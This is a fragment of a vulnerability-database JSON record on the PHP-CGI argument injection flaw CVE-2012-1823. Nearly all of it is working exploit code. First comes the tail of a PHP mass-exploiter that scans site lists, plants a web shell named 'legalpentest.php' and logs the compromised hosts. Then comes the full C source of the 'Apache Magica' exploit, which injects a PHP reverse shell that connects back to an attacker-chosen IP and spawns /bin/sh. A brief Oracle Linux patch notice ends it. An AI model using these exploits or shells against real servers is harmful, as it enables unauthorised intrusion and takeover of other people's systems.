{ \r\nprintit&#40;&#92;&quot;ERROR: Shell connection terminated&#92;&quot;&#41;; break;} if \r\n&#40;feof&#40;&#92;$pipes[1]&#41;&#41; {printit&#40;&#92;&quot;ERROR: Shell process \r\nterminated&#92;&quot;&#41;;break;}&#92;$read_a = array&#40;&#92;$sock, &#92;$pipes[1], \r\n&#92;$pipes[2]&#41;;&#92;$num_changed_sockets = stream_select&#40;&#92;$read_a, &#92;$write_a, \r\n&#92;$error_a, null&#41;;if &#40;in_array&#40;&#92;$sock, &#92;$read_a&#41;&#41; {if &#40;&#92;$debug&#41; \r\nprintit&#40;&#92;&quot;SOCK READ&#92;&quot;&#41;;&#92;$input = fread&#40;&#92;$sock, \r\n&#92;$chunk_size&#41;;if&#40;&#92;$debug&#41; printit&#40;&#92;&quot;SOCK: \r\n&#92;$input&#92;&quot;&#41;;fwrite&#40;&#92;$pipes[0], &#92;$input&#41;;}if &#40;in_array&#40;&#92;$pipes[1], \r\n&#92;$read_a&#41;&#41; {if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDOUT READ&#92;&quot;&#41;;&#92;$input = \r\nfread&#40;&#92;$pipes[1], &#92;$chunk_size&#41;;if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDOUT: \r\n&#92;$input&#92;&quot;&#41;;fwrite&#40;&#92;$sock, &#92;$input&#41;;}if &#40;in_array&#40;&#92;$pipes[2], \r\n&#92;$read_a&#41;&#41; {if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDERR READ&#92;&quot;&#41;;&#92;$input = \r\nfread&#40;&#92;$pipes[2], &#92;$chunk_size&#41;; if &#40;&#92;$debug&#41; printit&#40;&#92;&quot;STDERR: \r\n&#92;$input&#92;&quot;&#41;;fwrite&#40;&#92;$sock, \r\n&#92;$input&#41;;}}fclose&#40;&#92;$sock&#41;;fclose&#40;&#92;$pipes[0]&#41;;fclose&#40;&#92;$pipes[1]&#41;;fclose&#40;&#92;$pipes[2]&#41;;proc_close&#40;&#92;$process&#41;;function printit &#40;&#92;$string&#41; {if &#40;!&#92;$daemon&#41; {print &#92;&quot;&#92;$string&#92;n&#92;&quot;;}} \r\n?&gt;&quot;;\r\n $packet = &quot;POST \r\n&quot;.$p.&quot;/?-d+allow_url_include&#37;3d1+-d+auto_prepend_file&#37;3dphp://input \r\nHTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: PHP CGI Argument Injection Exploiter&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Type: application/x-www-form-urlencoded&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Length: &quot;.strlen&#40;$payload&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;\r\n $packet .= $payload.&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n\r\n}elseif &#40;isset&#40;$_POST[&#39;Submit&#39;]&#41; &amp;&amp; $list != &#39;&#39; &amp;&amp; $file != &#39;&#39;&#41;\r\n{\r\n if &#40;$port==&#39;&#39;&#41; {$port=80;}\r\n\r\n for &#40;$n =0; $n &lt; count&#40;$list&#41;; $n++&#41;\r\n {\r\n\r\n $siteAddbackup = $list[$n];\r\n $siteAdd=str_replace&#40;&quot;http://&quot;,&quot;&quot;,$siteAddbackup&#41;;\r\n \r\npreg_match&#40;&#39;/^&#40;?:&#40;?:http|https&#41;:&#92;/&#92;/&#41;?[^&#92;/]+&#40;&#92;/.+&#92;/&#41;[^&#92;/&#92;.]+&#92;.[^&#92;/&#92;.]+$/i&#39;,$siteAddbackup, \r\n$match&#41;;\r\n $path = $match[1];\r\n $pa = strstr&#40;trim&#40;$siteAdd&#41;,$path&#41;;\r\n $host=trim&#40;str_replace&#40;$pa,&quot;&quot;,$siteAdd&#41;&#41;;\r\n if &#40;$path ==&#39;&#39;&#41;{$path = &quot;/&quot;; }\r\n if &#40;$proxy==&#39;&#39;&#41; {$p=$path;} else {$p=&#39;http://&#39;.$host.$path;}\r\n\r\n /* Checking \r\nAvailability */\r\n\r\n $connection = fsockopen&#40;$host,$port&#41;;\r\n if &#40;!$connection&#41;\r\n // site is down\r\n {\r\n echo &#39;&lt;font color=red&gt; No response from \r\n&#39;.htmlentities&#40;$host&#41;.&#39; ...&lt;br&gt;&lt;/font&gt;&#39;;\r\n \r\nfile_put_contents&#40;realpath&#40;dirname&#40;__FILE__&#41;&#41;.&#39;/notconnected.txt&#39;, \r\n$siteAddbackup.&quot;&#92;r&#92;n&quot;, FILE_APPEND&#41;;\r\n }\r\n else\r\n // site is up\r\n {\r\n fclose&#40;$connection&#41;;\r\n Exploitable&#40;$host,$path,$p&#41;;\r\n }\r\n\r\n}\r\n}\r\n\r\nFunction Exploitable&#40;$host,$path,$p&#41;\r\n{\r\n global $html;\r\n $i=0;\r\n /* Checking Exploitability */\r\n $packet = &quot;GET &quot;.$p.&quot;?-s HTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: PHP CGI Argument Injection Exploiter &#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n $str = array&#40;\r\n &#39;&lt;code&gt;&lt;span&#39;,&#39;&amp;lt;?&#39;&#41;;\r\n foreach &#40;$str as $value =&gt; $search&#41;{\r\n if&#40;stristr&#40;$html, $search&#41; == TRUE&#41;\r\n {$i=$i+1;}}\r\n switch&#40;$i&#41;\r\n {\r\n case 0:\r\n echo &#39;&lt;font color=red&gt;&#39;.$host.&#39; Faild!&lt;br&gt;&lt;/font&gt;&#39;;\r\n break;\r\n case 2:\r\n echo &#39;&lt;font color=#FFF8C6&gt;&#39;.$host.&#39; Exploitable&lt;br&gt;&lt;/font&gt;&#39;;\r\n Exploit&#40;$host,$path,$p&#41;;\r\n }\r\n}\r\n\r\nFunction Exploit&#40;$host,$path,$p&#41;\r\n{\r\nglobal $html, $shell;\r\n /* Exploiting */\r\n\r\n $payload = &quot;&lt;?php &#92;$myFile = &#92;&quot;legalpentest.php&#92;&quot;; &#92;$filehandle = \r\nfopen&#40;&#92;$myFile, &#39;w&#39;&#41; or die&#40;&#92;&quot;can&#39;t open file&#92;&quot;&#41;; &#92;$Data=$shell; \r\nfwrite&#40;&#92;$filehandle, &#92;$Data&#41;;fclose&#40;&#92;$filehandle&#41;;&quot;;\r\n $packet = &quot;POST \r\n&quot;.$p.&quot;/?-d+allow_url_include&#37;3d1+-d+auto_prepend_file&#37;3dphp://input \r\nHTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: PHP CGI Argument Injection Exploiter&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Type: application/x-www-form-urlencoded&#92;r&#92;n&quot;;\r\n $packet .= &quot;Content-Length: &quot;.strlen&#40;$payload&#41;.&quot;&#92;r&#92;n&#92;r&#92;n&quot;;\r\n $packet .= $payload.&quot;&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n /* Check for successfully \r\nuploaded */\r\n $packet = &quot;HEAD &quot;.$p.&quot;/legalpentest.php HTTP/1.1&#92;r&#92;n&quot;;\r\n $packet .= &quot;Host: &quot;.$host.&quot;&#92;r&#92;n&quot;;\r\n $packet .= &quot;User-Agent: :&#41; &#92;r&#92;n&#92;r&#92;n&quot;;\r\n sendpacket&#40;$packet,1,0,0&#41;;\r\n\r\n if&#40;stristr&#40;$html , &#39;404 Not Found&#39;&#41; == true&#41;\r\n {\r\n echo &#39;&lt;font color=#FFF8C6&gt;&lt;br&gt;Exploit \r\nFaild...&lt;br&gt;-------------------------------------------------------&lt;br&gt;&lt;/font&gt;&#39;;\r\n }\r\n else {\r\n echo &quot;&lt;font color=#FFF8C6&gt;&lt;br&gt;Exploit \r\nSucceeded...&lt;br&gt;http://$host$path&quot;.&quot;/legalpentest.php&lt;br&gt;-------------------------------------------------------&lt;br&gt;&lt;/font&gt;&quot;;\r\n file_put_contents&#40;realpath&#40;dirname&#40;__FILE__&#41;&#41;.&#39;/shell.txt&#39;, \r\n&quot;http://$host$path&quot;.&quot;/legalpentest.php&#92;r&#92;n&quot;, FILE_APPEND&#41;;\r\n }\r\n}\r\n\r\n\r\nfunction sendpacket&#40;$packet,$response = 0,$output = 0,$s=0&#41;\r\n{\r\n $proxy_regex = &#39;&#40;&#92;b&#92;d{1,3}&#92;.&#92;d{1,3}&#92;.&#92;d{1,3}&#92;.&#92;d{1,3}&#92;:&#92;d{1,5}&#92;b&#41;&#39;;\r\n global $proxy, $host, $port, $html, $user, $pass;\r\n if &#40;$proxy == &#39;&#39;&#41;\r\n {\r\n $ock = fsockopen&#40;$host,$port&#41;;\r\n stream_set_timeout&#40;$ock, 5&#41;;\r\n if &#40;!$ock&#41;\r\n {\r\n echo &#39;No response from &#39;.htmlentities&#40;$host&#41;.&#39; ...&lt;br&gt;&#39;;\r\n stream_set_timeout&#40;$ock, 4&#41;;\r\n }\r\n } else\r\n {\r\n $parts = explode&#40;&#39;:&#39;,$proxy&#41;;\r\n // echo &#39;&lt;font color=white&gt;Connecting to proxy: \r\n&#39;.$parts[0].&#39;:&#39;.$parts[1].&#39; ...&lt;br&gt;&lt;br/&gt;&lt;/font&gt;&#39;;\r\n $ock = fsockopen&#40;$parts[0],$parts[1]&#41;;\r\n stream_set_timeout&#40;$ock, 5&#41;;\r\n if &#40;!$ock&#41;\r\n {\r\n echo &#39;No response from proxy...&lt;br&gt;&#39;;\r\n fclose&#40;$ock&#41;;\r\n }\r\n }\r\n\r\n if &#40;$ock&#41;\r\n {\r\n fputs&#40;$ock,$packet&#41;;\r\n if &#40;$response == 1&#41;\r\n {\r\n if &#40;$proxy == &#39;&#39;&#41;\r\n {\r\n $html = &#39;&#39;;\r\n while &#40;!feof&#40;$ock&#41;&#41;\r\n {\r\n $html .= fgets&#40;$ock&#41;;\r\n }\r\n } else\r\n {\r\n $html = &#39;&#39;;\r\n while &#40;&#40;!feof&#40;$ock&#41;&#41; or \r\n&#40;!eregi&#40;chr&#40;0x0d&#41;.chr&#40;0x0a&#41;.chr&#40;0x0d&#41;.chr&#40;0x0a&#41;,$html&#41;&#41;&#41;\r\n {\r\n $html .= fread&#40;$ock,1&#41;;\r\n }\r\n }\r\n } else $html = &#39;&#39;;\r\n\r\n fclose&#40;$ock&#41;;\r\n }\r\n}\r\n?&gt;\r\n", "edition": 1, "modified": "2012-05-24T00:00:00", "published": "2012-05-24T00:00:00", "id": "SECURITYVULNS:DOC:28089", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28089", "title": "PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache + PHP 5.3.12 5.4.2 - cgi-bin Remote Code Execution", "edition": 1, "published": "2013-10-29T00:00:00", "title": "Apache + PHP 5.3.12 5.4.2 - cgi-bin Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1823"], "modified": "2013-10-29T00:00:00", "id": "EXPLOITPACK:85B20F0533D328BC2DFA7020D0F11896", "href": "", "sourceData": "/* Apache Magica by Kingcope */\n/* gcc apache-magika.c -o apache-magika -lssl */\n/* This is a code execution bug in the combination of Apache and PHP.\nOn Debian and Ubuntu the vulnerability is present in the default install\nof the php5-cgi package. When the php5-cgi package is installed on Debian and\nUbuntu or php-cgi is installed manually the php-cgi binary is accessible under\n/cgi-bin/php5 and /cgi-bin/php. The vulnerability makes it possible to execute\nthe binary because this binary has a security check enabled when installed with\nApache http server and this security check is circumvented by the exploit.\nWhen accessing the php-cgi binary the security check will block the request and\nwill not execute the binary.\nIn the source code file sapi/cgi/cgi_main.c of PHP we can see that the security\ncheck is done when the php.ini configuration setting cgi.force_redirect is set\nand the php.ini configuration setting cgi.redirect_status_env is set to no.\nThis makes it possible to execute the binary bypassing the Security check by\nsetting these two php.ini settings.\nPrior to this code for the Security check getopt is called and it is possible\nto set cgi.force_redirect to zero and cgi.redirect_status_env to zero using the\n-d switch. If both values are set to zero and the request is sent to the server\nphp-cgi gets fully executed and we can use the payload in the POST data field\nto execute arbitrary php and therefore we can execute programs on the system.\napache-magika.c is an exploit that does exactly the prior described. It does\nsupport SSL.\n/* Affected and tested versions\nPHP 5.3.10\nPHP 5.3.8-1\nPHP 5.3.6-13\nPHP 5.3.3\nPHP 5.2.17\nPHP 5.2.11\nPHP 5.2.6-3\nPHP 5.2.6+lenny16 with Suhosin-Patch\nAffected versions\nPHP prior to 5.3.12\nPHP prior to 5.4.2\nUnaffected versions\nPHP 4 - getopt parser unexploitable\nPHP 5.3.12 and up\nPHP 5.4.2 and up\nUnaffected versions are patched by CVE-2012-1823.\n*/\n/* .\n /'\\rrq rk\n . // \\\\ .\n.x.//fco\\\\-|-\n '//cmtco\\\\zt\n //6meqrg.\\\\tq\n//_________\\\\'\nEJPGQO\napache-magica.c by Kingcope\n*/\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <sys/types.h>\n#include <stddef.h>\n#include <openssl/rand.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <netdb.h>\n#include <sys/socket.h>\n#include <netinet/in.h>\n\ntypedef struct {\n\tint sockfd;\n\tSSL *handle;\n\tSSL_CTX *ctx;\n} connection;\n\nvoid usage(char *argv[])\n{\n printf(\"usage: %s <--target target> <--port port> <--protocol http|https> \" \\\n \"<--reverse-ip ip> <--reverse-port port> [--force-interpreter interpreter]\\n\",\n argv[0]);\n exit(1);\n}\n\nchar poststr[] = \"POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F\" \\\n \"%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64\" \\\n \"+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73\" \\\n \"%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E\" \\\n \"%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63\" \\\n \"%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62\" \\\n \"%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74\" \\\n \"%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68\" \\\n \"%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F\" \\\n \"%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63\" \\\n \"%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73\" \\\n \"%%5F%%65%%6E%%76%%3D%%30+%%2D%%6E HTTP/1.1\\r\\n\" \\\n \"Host: %s\\r\\n\" \\\n \"User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26\" \\\n \"(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25\\r\\n\" \\\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\" \\\n \"Content-Length: %d\\r\\n\" \\\n \"Connection: close\\r\\n\\r\\n%s\";\nchar phpstr[] = \"<?php\\n\" \\\n\"set_time_limit(0);\\n\" \\\n\"$ip = '%s';\\n\" \\\n\"$port = %d;\\n\" \\\n\"$chunk_size = 1400;\\n\" \\\n\"$write_a = null;\\n\" \\\n\"$error_a = null;\\n\" \\\n\"$shell = 'unset HISTFILE; unset HISTSIZE; uname -a; w; id; /bin/sh -i';\\n\" \\\n\"$daemon = 0;\\n\" \\\n\"$debug = 0;\\n\" \\\n\"if (function_exists('pcntl_fork')) {\\n\" \\\n\"\t$pid = pcntl_fork();\t\\n\" \\\n\"\tif ($pid == -1) {\\n\" \\\n\"\t\tprintit(\\\"ERROR: Can't fork\\\");\\n\" \\\n\"\t\texit(1);\\n\" \\\n\"\t}\\n\" \\\n\"\tif ($pid) {\\n\" \\\n\"\t\texit(0);\\n\" \\\n\"\t}\\n\" \\\n\"\tif (posix_setsid() == -1) {\\n\" \\\n\"\t\tprintit(\\\"Error: Can't setsid()\\\");\\n\" \\\n\"\t\texit(1);\\n\" \\\n\"\t}\\n\" \\\n\"\t$daemon = 1;\\n\" \\\n\"} else {\\n\" \\\n\"\tprintit(\\\"WARNING: Failed to daemonise.\\\");\\n\" \\\n\"}\\n\" \\\n\"chdir(\\\"/\\\");\\n\" \\\n\"umask(0);\\n\" \\\n\"$sock = fsockopen($ip, $port, $errno, $errstr, 30);\\n\" \\\n\"if (!$sock) {\\n\" \\\n\"\tprintit(\\\"$errstr ($errno)\\\");\\n\" \\\n\"\texit(1);\\n\" \\\n\"}\\n\" \\\n\"$descriptorspec = array(\\n\" \\\n\" 0 => array(\\\"pipe\\\", \\\"r\\\"),\\n\" \\\n\" 1 => array(\\\"pipe\\\", \\\"w\\\"),\\n\" \\\n\" 2 => array(\\\"pipe\\\", \\\"w\\\")\\n\" \\\n\");\\n\" \\\n\"$process = proc_open($shell, $descriptorspec, $pipes);\\n\" \\\n\"if (!is_resource($process)) {\\n\" \\\n\"\tprintit(\\\"ERROR: Can't spawn shell\\\");\\n\" \\\n\"\texit(1);\\n\" \\\n\"}\\n\" \\\n\"stream_set_blocking($pipes[0], 0);\\n\" \\\n\"stream_set_blocking($pipes[1], 0);\\n\" \\\n\"stream_set_blocking($pipes[2], 0);\\n\" \\\n\"stream_set_blocking($sock, 0);\\n\" \\\n\"while (1) {\\n\" \\\n\"\tif (feof($sock)) {\\n\" \\\n\"\t\tprintit(\\\"ERROR: Shell connection terminated\\\");\\n\" \\\n\"\t\tbreak;\\n\" \\\n\"\t}\\n\" \\\n\"\tif (feof($pipes[1])) {\\n\" \\\n\"\t\tprintit(\\\"ERROR: Shell process terminated\\\");\\n\" \\\n\"\t\tbreak;\\n\" \\\n\"\t}\\n\" \\\n\"\t$read_a = array($sock, $pipes[1], $pipes[2]);\\n\" \\\n\"\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\\n\" \\\n\"\tif (in_array($sock, $read_a)) {\\n\" \\\n\"\t\tif ($debug) printit(\\\"SOCK READ\\\");\\n\" \\\n\"\t\t$input = fread($sock, $chunk_size);\\n\" \\\n\"\t\tif ($debug) printit(\\\"SOCK: $input\\\");\\n\" \\\n\"\t\tfwrite($pipes[0], $input);\\n\" \\\n\"\t}\\n\" \\\n\"\tif (in_array($pipes[1], $read_a)) {\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDOUT READ\\\");\\n\" \\\n\"\t\t$input = fread($pipes[1], $chunk_size);\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDOUT: $input\\\");\\n\" \\\n\"\t\tfwrite($sock, $input);\\n\" \\\n\"\t}\\n\" \\\n\"\tif (in_array($pipes[2], $read_a)) {\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDERR READ\\\");\\n\" \\\n\"\t\t$input = fread($pipes[2], $chunk_size);\\n\" \\\n\"\t\tif ($debug) printit(\\\"STDERR: $input\\\");\\n\" \\\n\"\t\tfwrite($sock, $input);\\n\" \\\n\"\t}\\n\" \\\n\"}\\n\" \\\n\"\\n\" \\\n\"fclose($sock);\\n\" \\\n\"fclose($pipes[0]);\\n\" \\\n\"fclose($pipes[1]);\\n\" \\\n\"fclose($pipes[2]);\\n\" \\\n\"proc_close($process);\\n\" \\\n\"function printit ($string) {\\n\" \\\n\"\tif (!$daemon) {\\n\" \\\n\"\t\tprint \\\"$string\\n\\\";\\n\" \\\n\"\t}\\n\" \\\n\"}\\n\" \\\n\"exit(1);\\n\" \\\n\"?>\";\n\nstruct sockaddr_in *gethostbyname_(char *hostname, unsigned short port)\n{\n struct hostent *he;\n struct sockaddr_in server, *servercopy;\n \n if ((he=gethostbyname(hostname)) == NULL) {\n printf(\"Hostname cannot be resolved\\n\");\n exit(255);\n }\n \n servercopy = malloc(sizeof(struct sockaddr_in));\n if (!servercopy) {\n\tprintf(\"malloc error (1)\\n\");\n\texit(255);\n }\n memset(&server, '\\0', sizeof(struct sockaddr_in));\n memcpy(&server.sin_addr, he->h_addr_list[0], he->h_length);\n server.sin_family = AF_INET;\n server.sin_port = htons(port);\n memcpy(servercopy, &server, sizeof(struct sockaddr_in));\n return servercopy;\n}\n\nchar *sslread(connection *c)\n{\n char *rc = NULL;\n int received, count = 0, count2=0;\n char ch;\n\n for(;;)\n {\n if (!rc)\n rc = calloc(1024, sizeof (char) + 1);\n else\n if (count2 % 1024 == 0) {\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\n }\n received = SSL_read(c->handle, &ch, 1);\n if (received == 1) {\n rc[count++] = ch;\n count2++;\n if (count2 > 1024*5)\n\t break;\n }\n else\n break;\n }\n return rc;\n}\n\nchar *read_(int sockfd)\n{\n char *rc = NULL;\n int received, count = 0, count2=0;\n char ch;\n\n for(;;)\n {\n if (!rc)\n rc = calloc(1024, sizeof (char) + 1);\n else\n if (count2 % 1024 == 0) {\n rc = realloc(rc, (count2 + 1) * 1024 * sizeof (char) + 1);\n }\n received = read(sockfd, &ch, 1);\n if (received == 1) {\n rc[count++] = ch;\n count2++;\n if (count2 > 1024*5)\n\t break;\n }\n else\n break;\n }\n return rc;\n}\n\nvoid main(int argc, char *argv[])\n{\n char *target, *protocol, *targetip, *writestr, *tmpstr, *readbuf=NULL,\n *interpreter, *reverseip, *reverseportstr, *forceinterpreter=NULL;\n char httpsflag=0;\n unsigned short port=0, reverseport=0;\n struct sockaddr_in *server;\n int sockfd;\n unsigned int writesize, tmpsize;\n unsigned int i;\n connection *sslconnection;\n printf(\"-== Apache Magika by Kingcope ==-\\n\");\n for(;;)\n {\n\t int c;\n int option_index=0;\n static struct option long_options[] = {\n\t {\"target\", required_argument, 0, 0 },\n\t {\"port\", required_argument, 0, 0 },\n\t {\"protocol\", required_argument, 0, 0 },\n\t {\"reverse-ip\", required_argument, 0, 0 },\n\t {\"reverse-port\", required_argument, 0, 0 },\n\t {\"force-interpreter\", required_argument, 0, 0 },\t \n\t {0, 0, 0, 0 }\n\t };\n\t \n\t c = getopt_long(argc, argv, \"\", long_options, &option_index);\n if (c < 0)\n \tbreak;\n \n switch (c) {\n\t case 0:\n\t switch (option_index) {\n\t case 0:\n\t if (optarg) {\n\t target = calloc(strlen(optarg)+1, sizeof(char));\n\t if (!target) {\n\t\t printf(\"calloc error (2)\\n\");\n\t exit(255);\n }\n\t memcpy(target, optarg, strlen(optarg)+1);\n \t}\n break;\n case 1:\n if(optarg)\n\t port = atoi(optarg);\n break;\n case 2:\n protocol = calloc(strlen(optarg)+1, sizeof(char));\n if (!protocol) {\n\t printf(\"calloc error (3)\\n\");\n exit(255);\n }\n memcpy(protocol, optarg, strlen(optarg)+1);\n if (!strcmp(protocol, \"https\"))\n httpsflag=1;\n break;\n case 3:\n reverseip = calloc(strlen(optarg)+1, sizeof(char));\n if (!reverseip) {\n\t printf(\"calloc error (4)\\n\");\n exit(255);\n }\n memcpy(reverseip, optarg, strlen(optarg)+1); \n break;\n case 4:\n\t reverseport = atoi(optarg); \n\t\treverseportstr = calloc(strlen(optarg)+1, sizeof(char));\n if (!reverseportstr) {\n\t printf(\"calloc error (5)\\n\");\n exit(255);\n }\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \t \n break;\n case 5:\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\n if (!forceinterpreter) {\n\t printf(\"calloc error (6)\\n\");\n exit(255);\n }\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \n break;\n default:\n usage(argv);\n\t }\n\t break;\n\t \n\t default:\n\t usage(argv);\n }\n }\n\n if ((optind < argc) || !target || !protocol || !port ||\n !reverseip || !reverseport){\n\tusage(argv);\n }\n \n server = gethostbyname_(target, port);\n if (!server) {\n printf(\"Error while resolving hostname. (7)\\n\");\n exit(255);\n }\n\n char *interpreters[5];\n int ninterpreters = 5;\n interpreters[0] = strdup(\"/cgi-bin/php\");\n interpreters[1] = strdup(\"/cgi-bin/php5\");\n interpreters[2] = strdup(\"/cgi-bin/php-cgi\");\n interpreters[3] = strdup(\"/cgi-bin/php.cgi\");\n interpreters[4] = strdup(\"/cgi-bin/php4\");\n \n for (i=0;i<ninterpreters;i++) {\n interpreter = interpreters[i];\n if (forceinterpreter) {\n interpreter = strdup(forceinterpreter);\n }\n if (forceinterpreter && i)\n break;\n printf(\"%s\\n\", interpreter);\n \n sockfd = socket(AF_INET, SOCK_STREAM, 0);\n if (sockfd < 1) { \n\t printf(\"socket error (8)\\n\");\n\t exit(255);\n }\n \n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {\n printf(\"connect error (9)\\n\");\n exit(255);\t \n }\n if (httpsflag) {\n sslconnection = (connection*) malloc(sizeof(connection));\n if (!sslconnection) {\n printf(\"malloc error (10)\\n\");\n exit(255); \n }\n sslconnection->handle = NULL;\n sslconnection->ctx = NULL;\n\n SSL_library_init();\n\n sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());\n if (!sslconnection->ctx) {\n \t printf(\"SSL_CTX_new error (11)\\n\");\n exit(255);\n }\n\n sslconnection->handle = SSL_new(sslconnection->ctx);\n if (!sslconnection->handle) {\n \t printf(\"SSL_new error (12)\\n\");\n\t exit(255); \n }\n if (!SSL_set_fd(sslconnection->handle, sockfd)) {\n \t printf(\"SSL_set_fd error (13)\\n\");\n exit(255);\n }\n \n if (SSL_connect(sslconnection->handle) != 1) {\n\t printf(\"SSL_connect error (14)\\n\");\n exit(255); \n }\n }\n \n tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\n \n writesize = strlen(target) + strlen(interpreter) + \n strlen(poststr) + strlen(tmpstr) + 64;\n writestr = (char*)calloc(writesize, sizeof(char));\n snprintf(writestr, writesize, poststr, interpreter,\n target, strlen(tmpstr), tmpstr);\n \n if (!httpsflag) {\n\t write(sockfd, writestr, strlen(writestr));\n\t readbuf = read_(sockfd);\n } else {\n\t SSL_write(sslconnection->handle, writestr, strlen(writestr));\n\t readbuf = sslread(sslconnection);\n }\n \n if (readbuf) {\n printf(\"***SERVER RESPONSE***\\n\\n%s\\n\\n\", readbuf); \n } else {\n printf(\"read error (15)\\n\");\n exit(255);\t \n }\n }\n exit(1);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1823"], "description": "[5.3.3-7]\n- correct detection of = in CVE-2012-1823 fix (#818607)\n[5.3.3-6]\n- add security fix for CVE-2012-1823 (#818607)", "edition": 4, "modified": "2012-05-07T00:00:00", "published": "2012-05-07T00:00:00", "id": "ELSA-2012-0547", "href": "http://linux.oracle.com/errata/ELSA-2012-0547.html", "title": "php53 security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}